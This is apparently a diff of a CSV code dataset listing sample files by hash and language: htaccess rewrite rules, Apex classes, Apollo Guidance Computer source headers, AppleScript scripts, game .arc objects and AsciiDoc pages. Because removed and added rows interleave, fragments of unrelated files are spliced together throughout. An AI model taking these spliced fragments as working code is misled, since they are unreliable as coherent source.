- -","1256","0.9551330798479087","0.0","0.0" -"1a0343de1ea430229c24ddc4cf5a98c9c9cd0fb4",".htaccess",".htaccess","ApacheConf","order deny,allow - - -deny from all - - - -allow from all - - - -allow from all - - - -allow from all - - - -allow from all - - - -allow from all - - - -allow from all - - - -allow from all - - - -allow from all - - - -allow from all - - - -allow from all - - - -allow from all - - - -allow from all - - - -allow from all - - - -allow from all - - - -allow from all - - - -allow from all - - - -allow from all - - - + RewriteEngine On + + # the main rewrite rule for the frontend application + RewriteCond %{REQUEST_URI} !^/(backend/web|admin|storage/web|storage) + RewriteRule !^frontend/web /frontend/web%{REQUEST_URI} [L] + + # redirect to the page without a trailing slash (uncomment if necessary) + #RewriteCond %{REQUEST_URI} ^/admin/$ + #RewriteRule ^(admin)/ /$1 [L,R=301] + # the main rewrite rule for the backend application + RewriteCond %{REQUEST_URI} ^/admin + RewriteRule ^admin(.*) /backend/web/$1 [L] + + # redirect to the page without a trailing slash (uncomment if necessary) + #RewriteCond %{REQUEST_URI} ^/storage/$ + #RewriteRule ^(storage)/ /$1 [L,R=301] + # the main rewrite rule for the storage application + RewriteCond %{REQUEST_URI} ^/storage + RewriteRule ^storage(.*)$ /storage/web/$1 [L] -# Disabling MultiViews prevents unwanted negotiation, e.g. ""/app"" should not resolve -# to the front controller ""/index.php"" but be rewritten to ""/index.php/app"". - - Options -MultiViews - + # if a directory or a file of the frontend application exists, use the request directly + R","1225","0.9466769706336939","0.0","0.0" +"01bc21c285eb248c3dd5d36f9480c94a62095086",".htaccess",".htaccess","ApacheConf","Options -MultiViews +RewriteEngine On - - Rew","1256","0.9551330798479087","0.0","0.0" -"1787118542976eddf4b087c23fd2830870e78be5",".htaccess",".htaccess","ApacheConf"," RewriteEngine on +RewriteBase /jag_mvc/public RewriteCond %{REQUEST_FILENAME} !-d RewriteCond %{REQUEST_FILENAME} !-f -RewriteCond $1 !^(Config|Core|public|robots\.txt) -RewriteRule ^(.*)$ index.php/$1 [L] -","1256","0.9551330798479087","0.0","0.0" -"06f7c2d20d0d16785cfabddd6a94d742c39f910f","Tree.cls",".cls","Apex","//Modified By Dated Description -//anirudh.singh@cdk.com 22nd September, 2015 To upgrade the API Version FROM 24.0 to 34.0. -/* -List Roles=[Select Id, Name, ParentRoleId From UserRole]; -//for(sObject r : Roles) { system.debug(r); } - -Tree t=new Tree(); -t.sObjectParentField='ParentRoleId'; -t.AddList(Roles); -List objs=t.TreeToList(); -for(sObject r : objs) { system.debug(LOGGINGLEVEL.WARN,r); } -*/ - -global with sharing class Tree -{ - // the parent id field in the supplied sObjects - global string sObjectParentField; - - // tree data (or root node) - global Map Roots; - public Set ParentIds; - - // tree constructors - global Tree() { Roots=new Map(); } - global Tree(List o) { Roots=new Map(); AddList(o); } +RewriteRule ^(.+)$ index.php?url=$1 [QSA,L] +","1225","0.9466769706336939","0.0","0.0" +"0a986b06ca23e4a49d34b4721de18a10d4d24f9f",".htaccess",".htaccess","ApacheConf","Options +FollowSymLinks +IndexIgnore */* +# Turn on the RewriteEngine +RewriteEngine On +# Rules +RewriteCond %{REQUEST_FILENAME} !-f [OR] +RewriteCond %{REQUEST_FILENAME} !-d +RewriteRule . index.php +","1225","0.9466769706336939","0.0","0.0" +"0eb10b0ec8692e31c95e2f0ab58030a63913ba4c",".htaccess",".htaccess","ApacheConf","RewriteEngine On +#RewriteBase /user6/booker/server/api/rooms/ +RewriteBase /~user6/booker/server/api/rooms/ +RewriteCond %{REQUEST_FILENAME} !-f +RewriteCond %{REQUEST_FILENAME} !-d +RewriteRule ^.*$ index.php +DirectoryIndex index.php +","1225","0.9466769706336939","0.0","0.0" +"0113d4a3b6b23835e4a2da45e5c4ea73337ebcd4",".htaccess",".htaccess","ApacheConf","#Options +FollowSymLinks - // add a list of sObjects to the tree - public void AddList(List o) - { - if(ParentIds==Null) { ParentIds=new Set(); } +#IndexIgnore */* + +RewriteEngine on +RewriteCond %{REQUEST_FILENAME} !-f +RewriteCond %{REQUEST_FILENAME} !-d +RewriteRule . index.php","1225","0.9466769706336939","0.0","0.0" +"0f5d8d6ca33290342bdcbe8970166c8ebd3b4b72","MDLCardMedia.cls",".cls","Apex","""Filed out from Dolphin Smalltalk 7""! + +MDLCardInnerDiv subclass: #MDLCardMedia + instanceVariableNames: '' + classVariableNames: '' + poolDictionaries: '' + classInstanceVariableNames: ''! +MDLCardMedia guid: (GUID fromString: '{10355c51-b395-43ef-8d0a-96a57a203da9}')! +MDLCardMedia comment: 'Description -------------------- I am a brush to create a medias in a card.'! +!MDLCardMedia categoriesForClass!Material-Design-Lite-Components-Cards! ! +!MDLCardMedia methodsFor! + +initialize super initialize. self class: 'mdl-card__media'! ! +!MDLCardMedia categoriesFor: #initialize!initialization!public! ! + +","1676","1.0377708978328173","0.0","0.0" +"018a2ca6f0a6de5b796f8f1f56c367a09e282600","DaysToPayService.cls",".cls","Apex","public with sharing class DaysToPayService +{ + + public map> mCustPymntToOpenInvoice = new map>(); + public map mCustPymntToDTP = new map(); + public set mCustPymntKeys = new set(); + public list updateList = new list(); + public list custPayWithoutDTPList = new list(); + public list ConsolidatedUpdateList = new list(); + public list custWithoutPaymentList = new list(); + public list ClosedCIByCustPayList = new list(); + public list AllCompClosedCI = new list(); + public Decimal DTPTotal =0.0; + public Id CompanyId; + public set QueryFields = new set{'id','name','Bill_To_Customer__c' ,'Payment_Term__c','P","1676","1.0377708978328173","0.0","0.0" +"0c23c5b93b27001dd8595dce00d2f7d16b4dd9eb","AccountPlans.cls",".cls","Apex","global class AccountPlans { + webservice String area; + webservice String region; + + //Define an object in apex that is exposed in apex web service + + global class Plan { + webservice String name; + webservice Integer planNumber; + webservice Date planningPeriod; + webservice Id planId; + } + webservice static Plan createAccountPlan(Plan vPlan) { + + //A plan maps to the Account object in salesforce.com. + //So need to map the Plan class object to Account standard object + Account acct = new Account(); + acct.Name = vPlan.name; + acct.AccountNumber = String.valueOf(vPlan.planNumber); + insert acct; - for(sObject s : o) - { - ","1752","1.05989110707804","0.0","0.0" -"03381044bf6674974bdb60b947bf3eae3c33cbf5","Refactory.Browser.RefactoryTyper.cls",".cls","Apex","""Filed out from Dolphin Smalltalk""! + vPlan.planId=acct.Id; + return vPlan; -Core.Object subclass: #'Refactory.Browser.RefactoryTyper' - instanceVariableNames: 'model class variableTypes bestGuesses variableMessages backpointers methodName selectorLookup' - classVariableNames: '' - imports: #() - classInstanceVariableNames: '' - classConstants: {}! -Refactory.Browser.RefactoryTyper guid: (Core.GUID fromString: '{df340d5b-5ca0-48cb-8e8c-5153a7bc6a4c}')! -Refactory.Browser.RefactoryTyper comment: ''! -!Refactory.Browser.RefactoryTyper categoriesForClass!Refactory-Support! ! -!Refactory.Browser.RefactoryTyper methodsFor! - -collectionNameFor: aString - ^'-<1s>-' expandMacrosWith: aString! - -computeEquivalenceClassesForMethodsAndVars - | searcher | - backpointers := Dictionary new. - class instanceVariableNames do: [:each | backpointers at: each put: (Set with: each)]. - class withAllSubclasses - do: [:sub | sub selectors do: [:each | backpointers at: each put: (Set with: each)]]. - searcher := ParseTreeSearcher new. - searcher matches: '^``@obj","1752","1.05989110707804","0.0","0.0" -"0d7aa7ee3386923b6822293aed4fa48417256bcb","AccountAlertsMEAuraController.cls",".cls","Apex","public class AccountAlertsMEAuraController { - - @AuraEnabled - public static List getCampaignsInJeopardyByMEEmail(){ - try{ - user u=[select id ,Email,Country from user where id=:UserInfo.getUserId()]; - String Email=u.Email; - Map platforms = new Map{ - 'USA'=>'USA', - 'CAN'=>'CAN', - 'BRA'=>'CAN', - 'MEX'=>'CAN', - 'JPN'=>'JPN', - 'AUS'=>'AUS', - 'NZL'=>'AUS', - 'SGP'=>'AUS', - 'NLD'=>'EUR', - 'BEL'=>'EUR', - 'DEU'=>'EUR', - 'EUR'=>'EUR', - 'AUT'=>'EUR', - 'GBR'=>'GBR'}; - String platformCode; - if (null == u.Country) { - platformCode = 'USA'; - } else { - platformCode = platforms.get(u","1752","1.05989110707804","0.0","0.0" -"13e3d0399d8a4e3975158632e4e7829704d7fcd7","C62InvoiceLinePaymentTest.cls",".cls","Apex","@isTest -public class C62InvoiceLinePaymentTest{ - - static testmethod void InvoiceLinePayment(){ - club62__C62CommunitySettings__c comSetting = C62TestHandler.getComSetting(); - insert new club62__C62Taxes__c(club62__Room_Res_Tax_Percentage_1__c=8.875,club62__Room_Res_Tax_Percentage_1_Description__c='New York Sales Tax', - club62__Room_Res_Tax_Percentage_2__c=5.875,club62__Room_Res_Tax_Percentage_2_Description__c='5.875% NYC Occupancy Tax', - club62__Room_Res_Tax_1_Amount__c=null,club62__Room_Res_Tax_1_Amount_Description__c='NYC Hotel Tax',club62__Sales_Tax__c=8.875, - club62__Room_Res_Tax_2_Amount_Description__c='Unit Tax - Javits Center Fee',club62__Room_Res_Tax_2_Amount__c=null); - club62__Category__c mc5 = C62TestHandler.getMetr5YrMemCat(); - Contact c = C62TestHandler.getMember1(); - club62__Address__c cAdd = C62TestHandler.getMemAddress1(c); - cAdd.club62__Active__c = true; -","1752","1.05989110707804","0.0","0.0" -"138c8262627ece9f084b6d0670ac8442cd11c66e","BaseDomain.cls",".cls","Apex","public virtual class BaseDomain { - /** - * Provides access to the data represented by this domain class - **/ - public List Records { get; private set;} + } - public BaseDomain(List sObjectList) { - Records = sObjectList.clone(); - } -} -","1752","1.05989110707804","0.0","0.0" -"0064cc5cb7ca9170072cd79eeccc52b9db285501","LIST_PROCESSING_INTERPRETER.agc",".agc","Apollo Guidance Computer","### FILE=""Main.annotation"" +}","1676","1.0377708978328173","0.0","0.0" +"084295c904858a8567aef569120bcab2e687e973","Bestellvorschlag.cls",".cls","Apex","global class Bestellvorschlag { + + public static list Prod=new list(); + public static list Einkauf=new list(); + public static map>>>> EinkaufBestellung =new map>>>>(); + public static list EBtoInsert = new list(); +// public static list PS=new list(); + + webservice static String init(list ArtikelIds) { + Prod = [Select id, BEME01__c, Gueltiger_Einkaufspreis__c, Kreditor__c, Liefertermin__c, BESB01__c, PDKZ01__c, Typ__c, AUSW01__c, PJKZ01__c, SWFA01__c, AZME01__c, + MEDA01__r.Name, Isactive, Bestandsmeldung__c, Name, IVKZ01__c from Product2 where Id IN: ArtikelIds]; + system.debug('ARTIKEL IDS ' + ArtikelIds); + + String m = Einkauf_Bestellung(); + if(m != 'true') { + return m; + } + + m = match()","1676","1.0377708978328173","0.0","0.0" +"0cf390d93d0397731164e8ba1aa8410f1eb5814d","SelectDispatchPointController.cls",".cls","Apex","public with sharing class SelectDispatchPointController { + + //--------------------------- Parameters ----------------------------// + public string HaHa {get;set;} + public string StrMul{get;set;} + public string TotalCount {get;set;} + public string strDispatchId {get;set;} + public string ShowFewerUrl {get;set;} + public string ShowMoreUrl {get;set;} + public Set StoreIdSet = new Set(); + public Set DispatchIdList = new Set(); + + //--------------------------- Bind List ----------------------------// + public List OrderLineItemList {get; set;} + public List ProductList {get; set;} + public Map StoreIdNameMap = new Map(); + + //--------------------------- Page Init ----------------------------// + public PageReference Init(){ + string orderId = ApexPages.currentPage().getParameters().get('id'); + OrderLineItemList = GetOrderLineItems(orderId); + if(ApexPages.currentPage().getParameters().get('page') != ","1676","1.0377708978328173","0.0","0.0" +"0d01f73d18e233c31e81fdecdf14478637b06c69","SPS_BACK-UP_RCS_CONTROL.agc",".agc","Apollo Guidance Computer","### FILE=""Main.annotation"" ## Copyright: Public domain. -## Filename: LIST_PROCESSING_INTERPRETER.agc -## Purpose: This program is designed to extensively test the Apollo Guidance Computer -## (specifically the LM instantiation of it). It is built on top of a heavily -## stripped-down Aurora 12, with all code ostensibly added by the DAP Group -## removed. Instead Borealis expands upon the tests provided by Aurora, -## including corrected tests from Retread 44 and tests from Ron Burkey's -## Validation. +## Filename: SPS_BACK-UP_RCS_CONTROL.agc +## Purpose: A section of Luminary revision 98. +## It is part of the reconstructed source code for the a +## development version of the flight software for the Lunar +## Module's (LM) Apollo Guidance Computer (AGC) for Apollo 11. +## The code has been recreated from a copy of Luminary 99 +## revision 001, using asterisks indicating changed lines in +## the listing and Luminary Memo #85, which lists changes between +## Luminary 98 and 99. +## Reference: pp. 1507-1510 ## Assembler: yaYUL -## Contact: Mike Stewart . +## Contact: Ron Burkey . ## Website: www.ibiblio.org/apollo/index.html -## Mod history: 2016-12-20 MAS Created from Aurora 12 (with much DAP stuff removed). - -# SECTION 1 DISPATCHER -# -# ENTRY TO THE INTERPRETER. INTPRET SETS LOC TO THE FIRST INSTRUCTION, BANKSET TO THE FBANK OF THE -# OBJECT INTERPRETIVE PROGRAM, AND INTBIT15 TO THE BIT15 CONTENTS OF FBANK. INTE","21","0.6363636363636364","0.0","0.0" -"1446579cf3a62d9f86acd74cc5afd5ec8c2f9a23","P12.agc",".agc","Apollo Guidance Computer","### FILE=""Main.annotation"" -# Copyright: Public domain. -# Filename: P12.agc -# Purpose: Part of the source code for Luminary 1A build 099. -# It is part of the source code for the Lunar Module's (LM) -# Apollo Guidance Computer (AGC), for Apollo 11. -# Assembler: yaYUL -# Contact: Hartmuth Gutsche . -# Website: www.ibiblio.org/apollo. -# Pages: 838-842 -# Mod history: 2009-05-23 HG Transcribed from page images. -# -# This source code has been transcribed or otherwise adapted from -# digitized images of a hardcopy from the MIT Museum. The digitization -# was performed by Paul Fjeld, and arranged for by Deborah Douglas of -# the Museum. Many thanks to both. The images (with suitable reduction -# in storage size and consequent reduction in image quality as well) are -# available online at www.ibiblio.org/apollo. If for some reason you -# find that the images are illegible, contact me at info@sandroid.org -# about getting access to the (much) higher-quality images which Paul -# ","21","0.6363636363636364","0.0","0.0" -"0623086142bca58a240dd0b7c2f0fbbda9becdb3","P32-P35_P72-P75.agc",".agc","Apollo Guidance Computer","### FILE=""Main.annotation"" -# Copyright: Public domain. -# Filename: P32-P35_P72-P75.agc -# Purpose: A section of Luminary 1C, revision 131. -# It is part of the source code for the Lunar Module's (LM) -# Apollo Guidance Computer (AGC) for Apollo 13 and Apollo 14. -# This file is intended to be a faithful transcription, except -# that the code format has been changed to conform to the -# requirements of the yaYUL assembler rather than the -# original YUL assembler. -# Reference: pp. 628-660 of 1729.pdf. -# Contact: Ron Burkey . -# Website: www.ibiblio.org/apollo -# Mod history: 05/20/03 RSB. Began transcribing. - -# Page 628 -# COELLIPTIC SEQUENCE INITIATION (CSI) PROGRAMS (P32 AND P72) -# -# MOD NO -1 LOG SECTION -- P32-P35, P72-P75 -# MOD BY WHITE, P. DATE 1 JUNE 67 -# -# PURPOSE -# (1) TO CALCULATE PARAMETERS ASSOCIATED WTIH THE TIME FOLLOWING -# CONCENTRIC FLIGHT PLAN MANEUVERS -- THE CO-ELLIPTIC SEQUENCE -# INITIATION (CSI) MANEUVER AND THE CONSTANT DELTA ALTITUDE -# (CDH) MA","21","0.6363636363636364","0.0","0.0" +## Mod history: 2019-07-28 MAS Created from Luminary 99. + +## Page 1507 +# PROGRAM NAME: SPSRCS +# AUTHOR: EDGAR M. OSHIKA (AC ELECTRONICS) +# MODIFIED: TO RETURN TO ALL AXES VIA Q BY P. S. WEISSMAN, OCT 7, 1968 +# MOD","37","0.9736842105263158","0.0","0.0" +"065a8c91a609c6abfc96f8acb7f367ad983da3a6","DUMMY_206_INITIALIZATION.agc",".agc","Apollo Guidance Computer","### FILE=""Main.annotation"" +## Copyright: Public domain. +## Filename: DUMMY_206_INITIALIZATION.agc +## Purpose: A module for revision 0 of BURST120 (Sunburst). It +## is part of the source code for the Lunar Module's +## (LM) Apollo Guidance Computer (AGC) for Apollo 5. +## Assembler: yaYUL +## Contact: Ron Burkey . +## Website: www.ibiblio.org/apollo/index.html +## Mod history: 2016-09-30 RSB Created draft version. +## 2016-10-30 RSB Finished transcription. +## 2016-12-06 RSB Proofed comments with octopus/ProoferComments, +## changes were made. + +## Page 869 +# PROGRAM NAME - BEGIN206 +# MOD. NO. 3 +# MOD BY - D. LICKLY AND J. SAMPSON +# DATE - NOV. 22, 1966 +# LOG SECTION - DUMMY 206 INITIALIZATION +# ASSEMBLY - SUNBURST REVISION 36 + +# FUNCTIONAL DESCRIPTION - START UP TO TWO DELAYED JOBS OR TASKS AFTER SLAP1 FOR SIMULATION PURPOSES. + +# FIXED INITIALIZATION REQUIRED - PATCH STARTDT1 AND STARTDT2 TO REPRESENT THE TIME2,TIME1 VALUE AT THE TIME AT +# ","37","0.9736842105263158","0.0","0.0" "0c7aa15123fb3bf3c6b5b11732f65950093186ed","DISPLAY_INTERFACE_ROUTINES.agc",".agc","Apollo Guidance Computer","# Copyright: Public domain. # Filename: DISPLAY_INTERFACE_ROUTINES.agc # Purpose: Part of the source code for Comanche, build 055. It @@ -4782,10 +5106,28 @@ public class C62InvoiceLinePaymentTest{ # This AGC program shall also be referred to as Colossus 2A # # Prepared by -# Massachusetts Institute of Techn","21","0.6363636363636364","0.0","0.0" -"0dbde7e095cb1a0ef0a8760c31489fc5100eca4c","ALARM_AND_ABORT.agc",".agc","Apollo Guidance Computer","### FILE=""Main.annotation"" +# Massachusetts Institute of Techn","37","0.9736842105263158","0.0","0.0" +"084f0a96f4e635429fa0bd78401ffb23e9c616f6","main.agc",".agc","Apollo Guidance Computer","// **************************************************************************************************************************************************************** +// **************************************************************************************************************************************************************** +// +// File: main.agc +// Purpose: Main program +// Date: 2nd August 2016 +// Author: Paul Robson (paul@robsons.org.uk) +// +// **************************************************************************************************************************************************************** +// **************************************************************************************************************************************************************** + +#include ""source\common.agc"" // Source files. +#include ""source\drawing.agc"" +#include ""source\manager.agc"" +#include ""source\song.agc"" +#include ""source\panel.agc"" +#include ""source\metronome.agc"" +#includ","37","0.9736842105263158","0.0","0.0" +"06b8ca3ed1fdd4b13cee7f997ee8ae476cf4efe9","FRESH_START_AND_RESTART.agc",".agc","Apollo Guidance Computer","### FILE=""Main.annotation"" ## Copyright: Public domain. -## Filename: ALARM_AND_ABORT.agc +## Filename: FRESH_START_AND_RESTART.agc ## Purpose: A section of Comanche revision 051. ## It is part of the reconstructed source code for the ## original release of the flight software for the Command @@ -4795,689 +5137,851 @@ public class C62InvoiceLinePaymentTest{ ## exactly match those specified for Comanche 51 in NASA drawing ## 2021153D, which gives relatively high confidence that the ## reconstruction is correct. -## Reference: pp. 1493-1496 +## Reference: pp. 181-210 ## Assembler: yaYUL ## Contact: Ron Burkey . ## Website: www.ibiblio.org/apollo/index.html ## Mod history: 2019-07-30 MAS Created from Comanche 55. +## 2021-05-30 ABS 00 -> OO in various symbol names. +## ","37","0.9736842105263158","0.0","0.0" +"0a3869d194470b115b0d12a139751d00aee4ea08","daily-standup.applescript",".applescript","AppleScript","#!/usr/bin/osascript -## Page 1493 -# THE FOLLOWING SUBROUTINE MAY BE CALLED TO DISPLAY A NON-ABORTIVE ALARM CO","21","0.6363636363636364","0.0","0.0" -"1f52104f7ebf1f783ec249d4518064432dc8240b","zig-zag-matrix-1.applescript",".applescript","AppleScript","set n to 5 -- Size of zig-zag matrix (n^2 cells). - --- Create an empty matrix. -set m to {} -repeat with i from 1 to n - set R to {} - repeat with j from 1 to n - set end of R to 0 - end repeat - set end of m to R -end repeat - --- Populate the matrix in a zig-zag manner. -set {x, y, v, d} to {1, 1, 0, 1} -repeat while v < (n ^ 2) - if 1 ≤ x and x ≤ n and 1 ≤ y and y ≤ n then - set {m's item y's item x, x, y, v} to {v, x + d, y - d, v + 1} - else if x > n then - set {x, y, d} to {n, y + 2, -d} - else if y > n then - set {x, y, d} to {x + 2, n, -d} - else if x < 1 then - set {x, y, d} to {1, y, -d} - else if y < 1 then - set {x, y, d} to {x, 1, -d} - end if -end repeat ---> R = {{0, 1, 5, 6, 14}, {2, 4, 7, 13, 15}, {3, 8, 12, 16, 21}, {9, 11, 17, 20, 22}, {10, 18, 19, 23, 24}} - --- Reformat the matrix into a table for viewing. -repeat with i in m - repeat with j in i - set j's contents to (characters -(length of (n ^ 2 as string)) thru -1 of ("" "" & j)) as string - end repeat - set end of i to return -e","51","0.1328125","0.0","0.0" -"1e35c2e8f6d9dd0025344fb0476deae82f21aaab","optimised app-open check.applescript",".applescript","AppleScript","tell application ""BetterTouchTool"" - if is_app_running ""ColorSnapper2"" then - return "" "" - else - return """" - end if -end tell","51","0.1328125","0.0","0.0" -"18e2be46951f32e0a320bd9bd50a5ca7247378bf","supports-assistive-devices.applescript",".applescript","AppleScript","#!/bin/osascript - -on supportsAssistiveDevices() - try - tell application ""System Events"" to get UI elements enabled - on error - return ""ERROR_GUISCRIPT_UNREADABLE"" - end try -end supportsAssistiveDevices - -on run argv - return supportsAssistiveDevices() -end run -","51","0.1328125","0.0","0.0" -"00b333788b2743a8f48c85cbabf63b5183c06e26","Script 18-22.applescript",".applescript","AppleScript","on make_associative_list() - (* Make a new associative list that stores values using any objects as keys. +################################################################################ +# Tyme2 Daily Standup +# +# Read daily task items from Tyme2 application and print them to stdout for a +# morning report of the previous days activities. On Monday, this will scan for +# work accomplished over the weekend. +# +# This is intented to be run with `| pbcopy` so that the content is placed into +# the clipboard, but it could also be run quietly and piped to a text file. +# +# Author: Craig Davis +# License: MIT +# Copyright: Craig Davis 2016 +# +################################################################################ - Result: an associative list - Note: Users should not directly manipulate the contents of the returned - object. Instead, use the handlers provided to work with it safely. - *) - return {class:""associative list"", the_items:{}} -end make_associative_list - - -on find_record_for_key(the_assoc_list, the_key) - (* This is a private handler. Users should not use it directly. *) - considering diacriticals, hyphens, punctuation and white space but ignoring case - repeat with record_ref in the_items of the_assoc_list - if the_key of record_ref = the_key then return record_ref - end repeat - end considering - return missing value -- The key wasn't found -end find_record_for_key - - -on get_associative_item(the_assoc_list, the_key) - (* - Get the value for the given key in an associative list. - - the_assoc_list : associative list - the_key : anything -- the key to search for - Result : anything -- the ","51","0.1328125","0.0","0.0" -"0012d321fcba2c8ac0cfd55f350b37c12ca0c2cb","asciidoc.applescript",".applescript","AppleScript","set theText to ""{popclip text}"" as text -set theModifier to ""{popclip modifier flags}"" as text - -if (theModifier is ""131072"") then ---------- SHIFT: Italic - set openQuote to ""_"" - set closeQuote to ""_"" -else if (theModifier is ""1048576"") then ---- COMMAND: Highlight - set openQuote to ""#"" - set closeQuote to ""#"" -else if (theModifier is ""524288"") then ----- OPTION: Inline Code Block - set openQuote to ""`"" - set closeQuote to ""`"" -else if (theModifier is ""262144"") then ----- CONTROL: Underline - set openQuote to ""+++"" - set closeQuote to ""+++"" -else --------------------------------------- DEFAULT: Bold - set openQuote to ""*"" - set closeQuote to ""*"" -end if - -set the clipboard to (openQuote & theText & closeQuote) -","51","0.1328125","0.0","0.0" -"1843b7e457972e38b7e99e022a73e614097ed614","7960a0-7af8-45ab-9c70-3ecd2d528a4c.scpt",".scpt","AppleScript","1360820578559:struct('lastvisit':createDateTime(2012,11,16,5,42,58,522,""Europe/London""),'hitcount':2,'timecreated':createDateTime(2012,11,16,5,42,58,522,""Europe/London""))","324","0.84375","0.0","0.0" -"094e181a78530fabd3316f8ae4ce4283aa059e4d","ee6618-1806-4de7-9902-9c5b2fe8e644.scpt",".scpt","AppleScript","1359689506938:struct('lastvisit':createDateTime(2012,11,3,3,31,46,920,""Europe/London""),'hitcount':3,'timecreated':createDateTime(2012,11,3,3,31,3,548,""Europe/London""))","324","0.84375","0.0","0.0" -"18c5e8a5336825b35fc09b50f1b5dea515910b51","18028f-175e-49d7-9283-87db1efc9a1b.scpt",".scpt","AppleScript","1358685441895:struct('lastvisit':createDateTime(2012,10,22,13,37,21,857,""Europe/London""),'hitcount':3,'timecreated':createDateTime(2012,10,22,13,37,3,855,""Europe/London""))","324","0.84375","0.0","0.0" -"0becd583d91ca4681958506803b9c45177a5aa96","597113-70d4-483a-bf56-0fdf0c89ddeb.scpt",".scpt","AppleScript","1355660124543:struct('lastvisit':createDateTime(2012,9,17,13,15,24,501,""Europe/London""),'hitcount':3,'timecreated':createDateTime(2012,9,17,13,15,21,298,""Europe/London""))","324","0.84375","0.0","0.0" -"00a1786b8ac35df9cf4915c395123f0f98526010","a1fd73-a071-4ca3-b37c-7e62157c6aeb.scpt",".scpt","AppleScript","1358048953379:struct('lastvisit':createDateTime(2012,10,15,4,49,13,357,""Europe/London""),'hitcount':3,'timecreated':createDateTime(2012,10,15,4,48,48,261,""Europe/London""))","324","0.84375","0.0","0.0" -"069856afddcb1fe83601421f249b9da8eeca2fe7",".arc",".arc","Arc","@app -begin-app - -@static -folder _site -","64","1.2549019607843137","0.0","0.0" -"02cd50a698cd9f59a24aa6845caeb5bd55313985","validate_gen.arc",".arc","Arc",".//==================================================================== -.// -.// File: $RCSfile: validate_gen.arc,v $ -.// Version: $Revision: 1.29.24.1 $ -.// Modified: $Date: 2013/07/19 12:26:27 $ -.// -.// Copyright 2003-2014 Mentor Graphics Corporation All rights reserved. -.// -.//==================================================================== -.// -.invoke arc_env = GET_ENV_VAR( ""PTC_MC_ARC_DIR"" ) -.assign mc_archetypes = arc_env.result -.if ( mc_archetypes == """" ) - .print ""\nERROR: Environment variable PTC_MC_ARC_DIR not set."" - .exit 100 -.end if -.// -.invoke mc_root_pkg_name = GET_ENV_VAR(""PTC_MCC_ROOT"") -.assign mc_root_pkg = mc_root_pkg_name.result -.// -.include ""arc/get_names.inc"" -.// -.//=============================================== -.// -.// Generate the java class -.// We need to set the dom.Name to the instance variable name -.// before including the MC-Java files so that -.// the function invocations get the correct variable name. -.// -.select a","64","1.2549019607843137","0.0","0.0" -"06f2635a6bc180a1993a5956c81a84bc00e08ad2","t1.arc",".arc","Arc"," - - SUMMARY OF PM7 CALCULATION, Site No: 20084 - - MOPAC2012 (Version: 15.347L) - Tue Jan 19 13:16:23 2016 - No. of days left = 328 - - Empirical Formula: H16 O96 Mg24 Si32 = 168 atoms - - MERS=(2,2) PL GNORM=10 - Talc (MgO)3(SiO2)4(H2O) two dimensional layer. - - - - GEOMETRY OPTIMISED USING EIGENVECTOR FOLLOWING (EF). - SCF FIELD WAS ACHIEVED - - HEAT OF FORMATION = -10675.89920 KCAL/MOL = -44667.96225 KJ/MOL - TOTAL ENERGY = -32674.69541 EV - ELECTRONIC ENERGY = -13605980.72002 EV - CORE-CORE REPULSION = 13573306.02461 EV - GRADIENT NORM = 9.68631 - NO. OF FILLED LEVELS = 384 - IONIZATION POTENTIAL = 10.955971 EV - ","64","1.2549019607843137","0.0","0.0" -"109fd6eb58d3252a2e5af1509210fa164f1e6895","holyghost.arc",".arc","Arc","Object holyghost -race angel -face holyghost.111 -name holy ghost -monster 1 -sleep 1 -see_invisible 1 -can_see_in_dark 1 -no_pick 1 -alive 1 -exp 150 -ac 0 -wc 12 -dam 30 -hp 30 -maxhp 30 -Wis 10 -level 5 -resist_magic 50 -resist_blind 50 -speed 0.2 -weight 25000 -flying 1 -attacktype 512 -editable 1 -end -","64","1.2549019607843137","0.0","0.0" -"09a409fd804fd5c24c774df33baacce49e638290","bone_drake.arc",".arc","Arc","Object bone_drake -name bone drake -randomitems chinese -race dragon -face bone_drake.x11 -animation bone_drake -monster 1 -move_type walk -sleep 1 -level 50 -Con 6 -maxsp 40 -hp 8000 -maxhp 8000 -resist_cold 70 -resist_fear 100 -resist_fire 70 -resist_electricity 70 -resist_blind 100 -ac -10 -wc -60 -dam 40 -exp 100000 -alive 1 -no_pick 1 -speed -0.2 -weight 200000 -run_away 4 -end -More -Object bone_drake_2 -name bone drake -face bone_drake.x11 -animation bone_drake -alive 1 -x 1 -end -More -Object bone_drake_3 -name bone drake -face bone_drake.x11 -animation bone_drake -alive 1 -y 1 -end -More -Object bone_drake_4 -name bone drake -face bone_drake.x11 -animation bone_drake -alive 1 -x 1 -y 1 -end -","64","1.2549019607843137","0.0","0.0" -"1e6ed1d2ffb0e362f221b24ed7e286c90736af0d","overview_target_and_usage.adoc",".adoc","AsciiDoc","// Replace the content in <> -// Identify your target audience and explain how/why they would use this Quick Start. -//Avoid borrowing text from third-party websites (copying text from AWS service documentation is fine). Also, avoid marketing-speak, focusing instead on the technical aspect. +########################################################################## +# Variables +########################################################################## -[[_Toc481076926]]This Quick Start is for users who want to run Etleap within an existing or new VPC in their own AWS account. +# string Newline for formatting +set nl to "" +"" -[[_Toc535566609]]Please know that we may share who uses AWS Quick Starts with the AWS Partner Network (APN) Partner that collaborated with AWS on the content of the Quick Start.","2718","0.7841892671667628","0.0","0.0" -"0604140ee9f6ab1b45e84aadcfdb8b25d35e5231","jmx-management.adoc",".adoc","AsciiDoc","= JMX Management +# string Program output +set standup to """" -[WARNING] -*This topic relates to the most recent version of Mule ESB* -To see the corresponding topic in a previous version of Mule ESB, click MULE2USER:JMX%20Management[here] +# string Name of day +set today to (weekday of (current date)) -http://java.sun.com/jmx[Java Management Extensions (JMX)] is a simple and standard way to manage applications, devices, services, and other resources. JMX is dynamic, so you can use it to monitor and manage resources as they are created, installed, and implemented. You can also use JMX to monitor and manage the Java Virtual Machine (JVM). +# integer Seconds since midnigh","70","0.17326732673267325","0.0","0.0" +"11831df038fb62b3ff455e5af0d723ab508ad09e","fmGUI_ObjectClick_CancelButton.applescript",".applescript","AppleScript","-- fmGUI_ObjectClick_CancelButton({buttonRef:null}) +-- Erik Shagdar, NYHTC +-- Wrapper method for clicking the cancel button and waiting for the window to close -Each resource is instrumented by one or more Managed Beans, or MBeans. All MBeans are registered in an MBean Server. The JMX server agent consists of an Mbean Server and a set of services for handling Mbeans. -There are several link:/mule-user-guide/v/3.2/mule-agents[agents] provided with Mule ESB for JMX support. The easiest way to configure JMX is to use the default JMX support agent. +(* +REQUIRES: + fmGUI_ObjectClick_Button + + +HISTORY: + 1.1 - 2017-10-20 ( eshagdar ): wrapper for fmGUI_ObjectClick_SignInButton. + 1.0 - 2017-09-07 ( eshagdar ): created +*) + + +on run + + fmGUI_ObjectClick_CancelButton({}) + +end run + +-------------------- 